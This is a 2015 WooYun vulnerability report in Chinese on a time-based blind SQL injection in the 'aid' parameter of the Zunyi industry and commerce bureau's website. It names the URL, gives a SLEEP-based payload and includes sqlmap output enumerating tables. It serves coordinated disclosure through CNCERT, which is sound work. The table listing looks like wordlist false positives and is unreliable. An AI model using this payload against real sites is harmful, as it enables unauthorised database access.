当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095946

漏洞标题:遵义市工商行政管理局SQL注入一枚

相关厂商:cncert

漏洞作者: ucifer

提交时间:2015-02-06 17:40

修复时间:2015-03-23 17:42

公开时间:2015-03-23 17:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-11: 厂商已经确认,细节仅向厂商公开
2015-02-21: 细节向核心白帽子及相关领域专家公开
2015-03-03: 细节向普通白帽子公开
2015-03-13: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

RT~~

详细说明:

http://www.zyaic.gov.cn/include/Viewer/Viewer.php?aid=1
aid参数存在时间盲注

QQ截图20150206020101.png


Place: GET
Parameter: aid
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: aid=1 AND SLEEP(5)
---
[01:56:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: ASP.NET, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[01:56:51] [INFO] fetching tables for database: 'zyaic'
[01:56:51] [INFO] fetching number of tables for database 'zyaic'
[01:56:51] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[01:57:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[01:57:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[01:57:03] [WARNING] unable to retrieve the number of tables for database 'zyaic'
[01:57:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[01:57:07] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[01:57:07] [INFO] adding words used on web page to the check list
[01:57:44] [INFO] tried 81/3319 items (2%)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:57:57] [INFO] retrieved: topics
[01:59:05] [INFO] retrieved: pma_history
[01:59:57] [INFO] tried 339/3319 items (10%)
[01:59:58] [INFO] adjusting time delay to 2 seconds due to good response times
[01:59:58] [INFO] retrieved: CurrentUsers
[02:00:02] [INFO] retrieved: vcd_IMDB
[02:00:53] [INFO] retrieved: vcd_Covers
[02:01:16] [INFO] retrieved: DUMMY
[02:02:39] [INFO] retrieved: cmPublicationDetail
[02:02:49] [INFO] retrieved: phpbb_topics
[02:03:47] [INFO] retrieved: guava_roles
[02:03:58] [INFO] retrieved: jos_components
[02:04:34] [INFO] retrieved: document
[02:06:15] [INFO] retrieved: EthnicGroup
[02:07:48] [INFO] retrieved: adv
[02:09:35] [INFO] retrieved: jforum_forums
[02:10:38] [INFO] retrieved: jos_newsfeeds
[02:11:21] [INFO] retrieved: admin_user
[02:12:14] [INFO] retrieved: reguser
[02:12:49] [INFO] retrieved: ActiveDataFeed
[02:13:06] [INFO] retrieved: States
[02:13:25] [INFO] retrieved: tblNews
[02:13:26] [INFO] retrieved: tblOrders
[02:17:07] [INFO] retrieved: oil_biolmed_land
[02:17:31] [INFO] retrieved: oil_core_acl_aro_groups
[02:17:49] [INFO] retrieved: spip_messages
[02:18:28] [INFO] retrieved: nuke_main
[02:18:34] [INFO] retrieved: nuke_bbwords
[02:20:42] [INFO] retrieved: studierende
[02:20:52] [INFO] retrieved: tx_tcdirectmail_sentlog
[02:22:34] [INFO] retrieved: DEPARTAMENTOS
[02:22:49] [INFO] retrieved: cdb_creditslog
[02:23:25] [INFO] retrieved: pw_msg
[02:23:44] [INFO] retrieved: pw_members

Database: zyaic
[32 tables]
+-------------------------+
| ActiveDataFeed |
| CurrentUsers |
| DEPARTAMENTOS |
| DUMMY |
| EthnicGroup |
| States |
| admin_user |
| adv |
| cdb_creditslog |
| cmPublicationDetail |
| document |
| guava_roles |
| jforum_forums |
| jos_components |
| jos_newsfeeds |
| nuke_bbwords |
| nuke_main |
| oil_biolmed_land |
| oil_core_acl_aro_groups |
| phpbb_topics |
| pma_history |
| pw_members |
| pw_msg |
| reguser |
| spip_messages |
| studierende |
| tblNews |
| tblOrders |
| topics |
| tx_tcdirectmail_sentlog |
| vcd_Covers |
| vcd_IMDB

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 ucifer@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-11 13:51

厂商回复:

CNVD未直接复现所述情况,按照漏洞报送者所述情况整理通报,转由CNCERT下发给贵州分中心,由贵州分中心后续协调网站管理单位处置。

最新状态:

暂无